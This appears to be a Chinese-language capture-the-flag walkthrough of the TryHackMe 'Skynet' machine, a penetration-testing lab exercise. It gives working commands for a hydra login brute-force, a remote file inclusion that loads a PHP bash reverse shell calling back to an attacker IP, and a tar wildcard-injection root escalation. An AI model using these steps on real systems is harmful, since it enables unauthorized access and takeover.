thm-Skynet

thm
Word count: 1.1k   |   Reading time≈ 4 min

thm-Skynet wp

开始就一个页面,功能点也没有额外的用处

image-20240728100129018

爆破一下

1
gobuster dir --url http://10.10.228.250/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

image-20240728100454159

测试发现只有/squirrelmail 跳转到新的地方,其余的都是403

发现是一个邮件系统,到现在没什么信息

再扫描一下端口

image-20240728100936158

发现445端口开放了,使用的是网络文件共享服务

看一下他的共享

1
smbclient -L //10.10.228.250/

image-20240728101126160

发现可以有一个匿名共享,匿名共享可以直接登录

登录后有一个attention.txt文件和logs目录

image-20240728101822075

logs目录下有三个文件,只有log1.txt有内容

image-20240728101857178

把attention.txt和log1.txt下到本机

attention.txt的内容是所有员工需要去修改密码

image-20240728102217806

log1.txt的内容似乎是一堆密码

image-20240728102307334

attention.txt中的内容是Miles Dyson发的,而且Miles Dyson在共享上还有一个milesdyson共享目录

我们用milesdyson作为用户名,log1.txt作为密码,去爆破一下原本的邮件登录网站

http://10.10.228.250/squirrelmail/src/login.php

1
hydra -l milesdyson -P log1.txt 10.10.228.250 http-post-form "/squirrelmail/src/redirect.php:js_autodetect_results=1&just_logged_in=1&login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect."

image-20240728104151947

成功发现密码

来到后台页面

image-20240728104314564

这边有一个密码重置邮件

image-20240728104342249

1
2
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

猜测可能是SMB服务器milesdyson目录的密码

登录成功,查看一下smb服务器上的内容

image-20240728105525301

根目录全是pdf,还有一个notes目录

notes目录下也全是pdf和md文件

但是有一个important.txt文件

image-20240728105605131

把文件下载之后,查看里面的内容(其实也没必要下载,在SMB服务器中可以用more命令来查看)

image-20240728105700764

我们发现有一个隐藏的CMS

image-20240728105810868

打开后,发现没什么东西,再爆破一下网站

1
gobuster dir --url http://10.10.228.250/45kra24zxs28v3yd/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

image-20240728110342834

有个管理员页面,尝试原本的密码,但是没有用了

目前来说没有更多有利的信息去攻破这个CMS,尝试去搜索这个CMS的历史漏洞

正好能搜到一个远程文件包含的漏洞

https://www.exploit-db.com/exploits/25971

image-20240728110526289

验证,发现能够读取etc/passwd

image-20240728111107375

创建一个cmd.php

1
2
3
4
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.239.59/6666 0>&1'");
?>

在本地起一个服务

1
2
3
4
python -m http.server

nc -nlvp 6666
本地监听6666端口

然后访问

1
http://10.10.228.250/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.239.59:8000/cmd.php

拿到shell

image-20240728112653558

尝试进行提权,但是SUID位没有可以利用的,并且没有附加sudo权限

查看计划任务

image-20240728114532635

发现有一个每分钟执行一次的sh脚本

image-20240728114738989

该文件我们只能读和执行,没有办法被修改

image-20240728114812131

查看该文件的内容,发现这是一个备份脚本

由于tar命令会匹配所有的文件,那么我们可以利用–checkpoint和–checkpoint-action进行提权

1
2
3
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

我们创建文件–checkpoint=1和–checkpoint-action=exec=sh newroot.sh

这些文件都会成为

tar cf /home/milesdyson/backups/backup.tgz * 的参数

tar命令可以利用一个名为–checkpoint的参数,该参数允许在每次归档 X 个文件时(X的默认值为10)显示“进度”消息, –checkpoint还可以与 –checkpoint-action 标志串联使用,–checkpoint-action标志允许在到达检查点(checkpoint)时以二进制或脚本的形式执行某些操作

因此我们可以通过在/var/www/html下添加 –checkpoint=1 文件(启用检查点功能)和 –checkpoint-action=exec=xxx 文件(指定要执行的操作,检查点值为1,每归档一个文件都执行指定操作)

这样在每个文件被归档的时候都会执行一遍newroot.sh,创建一个/bin/bash的复制文件

在/var/www/html目录下执行如下命令

1
2
3
4
echo "cp /bin/bash /tmp/nroot && chmod +s /tmp/nroot" > newroot.sh
touch "/var/www/html/--checkpoint=1"
touch "/var/www/html/--checkpoint-action=exec=sh newroot.sh"

一分钟内,计划任务执行完毕,我们就可以调用/tmp/nroot -p 提权了

image-20240728121216773

提权成功

image-20240728121223951

Donate
  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2015-2024 John Doe
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信